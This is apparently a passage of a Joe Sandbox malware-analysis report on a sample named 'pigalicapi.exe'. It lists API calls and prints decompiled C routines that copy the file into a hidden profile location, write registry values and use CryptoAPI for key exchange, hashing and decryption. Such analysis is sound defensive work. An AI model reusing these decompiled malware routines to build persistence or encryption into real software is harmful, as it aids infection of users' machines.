                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegOpenKeyExA.KERNEL32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegCloseKey.ADVAPI32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 04003C85
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04003F70
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04003FF4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\pigalicapi.exe$Kobucgekyxca$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                          • API String ID: 1389186475-3751886320
                                                                                                                                                                                                                                                                          • Opcode ID: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                          • Instruction ID: 63648f9aec36bb26e753af5ac432a688f143a616cbd4529da37374c18a699aed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC11AB0944364AAF725DF64AC19BFA77B0AB04709F0480FDE6487A1E1DB7C6A84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 768 4008800-4008811 769 4008817-400881b 768->769 770 400895c-4008962 768->770 769->770 771 4008821-4008843 CryptAcquireContextA 769->771 772 4008845-4008855 GetLastError 771->772 773 400887a-400887e 771->773 774 4008860-4008874 CryptAcquireContextA 772->774 775 4008857-400885e 772->775 773->770 776 4008884-40088b7 CryptGenKey 773->776 774->773 775->773 775->774 777 4008950-4008956 CryptReleaseContext 776->777 778 40088bd-40088d7 CryptExportKey 776->778 777->770 779 4008946-400894a CryptDestroyKey 778->779 780 40088d9-40088dd 778->780 779->777 781 400893f 780->781 782 40088df-40088e3 780->782 781->779 782->781 783 40088e5-40088e9 782->783 783->781 784 40088eb-40088ef 783->784 784->781 785 40088f1-4008914 CryptImportKey 784->785 786 4008916-4008937 CryptExportKey CryptDestroyKey 785->786 787 400893d 785->787 786->787 787->779
                                                                                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                                                                                          			E04008800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				long* _v32;
                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                                                          				char* _t71;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t41 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t42 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t71 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v28 = 0x80;
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                          						_t43 = _v24;
                                                                                                                                                                                                                                                                          						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20); // executed
                                                                                                                                                                                                                                                                          						if(_t43 != 0) {
                                                                                                                                                                                                                                                                          							_t46 = _a4;
                                                                                                                                                                                                                                                                          							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                          							if(_t46 != 0) {
                                                                                                                                                                                                                                                                          								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                          									_v8 = 1;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v32 = 0;
                                                                                                                                                                                                                                                                          									_t49 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32); // executed
                                                                                                                                                                                                                                                                          									if(_t49 != 0) {
                                                                                                                                                                                                                                                                          										_t51 = _v20;
                                                                                                                                                                                                                                                                          										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                          										_v8 = _t51;
                                                                                                                                                                                                                                                                          										CryptDestroyKey(_v32);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                          0x04008806
                                                                                                                                                                                                                                                                          0x04008811
                                                                                                                                                                                                                                                                          0x0400895c
                                                                                                                                                                                                                                                                          0x04008962
                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                          0x04008831
                                                                                                                                                                                                                                                                          0x0400883b
                                                                                                                                                                                                                                                                          0x04008843
                                                                                                                                                                                                                                                                          0x0400884b
                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                          0x04008869
                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                          0x0400887e
                                                                                                                                                                                                                                                                          0x04008884
                                                                                                                                                                                                                                                                          0x0400888b
                                                                                                                                                                                                                                                                          0x0400889b
                                                                                                                                                                                                                                                                          0x040088a2
                                                                                                                                                                                                                                                                          0x040088af
                                                                                                                                                                                                                                                                          0x040088b7
                                                                                                                                                                                                                                                                          0x040088c1
                                                                                                                                                                                                                                                                          0x040088cf
                                                                                                                                                                                                                                                                          0x040088d7
                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                          0x0400893f
                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                          0x0400890c
                                                                                                                                                                                                                                                                          0x04008914
                                                                                                                                                                                                                                                                          0x04008926
                                                                                                                                                                                                                                                                          0x0400892a
                                                                                                                                                                                                                                                                          0x04008930
                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                          0x0400893d
                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400887e

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                          • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0400894A
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008956
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400882C
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008864
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                          • Instruction ID: e62ef6a9a3e861f5d7bfaf583d60d4f1649157d47df97182d85979e93aebb629
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641E972A00209EBFB54EF94C849BAE77B9FB44705F14C518F615B61C0C7B9AA84CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                                                                                                          			E04008BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                          				char* _t36;
                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                          				char* _t57;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t36 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                          						_t37 = GetLastError();
                                                                                                                                                                                                                                                                          						_v16 = _t37;
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t57 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                          						if(_t37 != 0) {
                                                                                                                                                                                                                                                                          							_t39 = _a8;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                          							if(_t39 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								_v28 = 4;
                                                                                                                                                                                                                                                                          								_t41 =  &_v28;
                                                                                                                                                                                                                                                                          								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                          								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                          									_v32 = _a16;
                                                                                                                                                                                                                                                                          									_t43 = _a12;
                                                                                                                                                                                                                                                                          									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                          									if(_t43 != 0) {
                                                                                                                                                                                                                                                                          										_v8 = _v32;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                          0x04008bb6
                                                                                                                                                                                                                                                                          0x04008bc1
                                                                                                                                                                                                                                                                          0x04008ce7
                                                                                                                                                                                                                                                                          0x04008ced
                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                          0x04008bf5
                                                                                                                                                                                                                                                                          0x04008bff
                                                                                                                                                                                                                                                                          0x04008c07
                                                                                                                                                                                                                                                                          0x04008c09
                                                                                                                                                                                                                                                                          0x04008c0f
                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                          0x04008c2d
                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                          0x04008c42
                                                                                                                                                                                                                                                                          0x04008c59
                                                                                                                                                                                                                                                                          0x04008c61
                                                                                                                                                                                                                                                                          0x04008c65
                                                                                                                                                                                                                                                                          0x04008c71
                                                                                                                                                                                                                                                                          0x04008c79
                                                                                                                                                                                                                                                                          0x04008c7b
                                                                                                                                                                                                                                                                          0x04008c82
                                                                                                                                                                                                                                                                          0x04008c8b
                                                                                                                                                                                                                                                                          0x04008c99
                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                          0x04008cae
                                                                                                                                                                                                                                                                          0x04008cb7
                                                                                                                                                                                                                                                                          0x04008cc1
                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008c42

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008BF0
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008C28
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                          • Instruction ID: 7e4f484856ccd150e5ceb993e2d8e8a423e5286abb412a2c571c9cca470c08b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41C772A50209ABEB14DF94C849FAFB7B9FB44705F14C529A601B61C0D7B8AA84CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                          				char* _t35;
                                                                                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                          				char* _t62;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t35 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t62 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                          						if(_t38 != 0) {
                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                          							_t43 = CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24); // executed
                                                                                                                                                                                                                                                                          							if(_t43 != 0) {
                                                                                                                                                                                                                                                                          								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                          								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04008a76
                                                                                                                                                                                                                                                                          0x04008a81
                                                                                                                                                                                                                                                                          0x04008ba3
                                                                                                                                                                                                                                                                          0x04008ba9
                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                          0x04008ac9
                                                                                                                                                                                                                                                                          0x04008ad3
                                                                                                                                                                                                                                                                          0x04008adb
                                                                                                                                                                                                                                                                          0x04008ae3
                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                          0x04008b01
                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                          0x04008b16
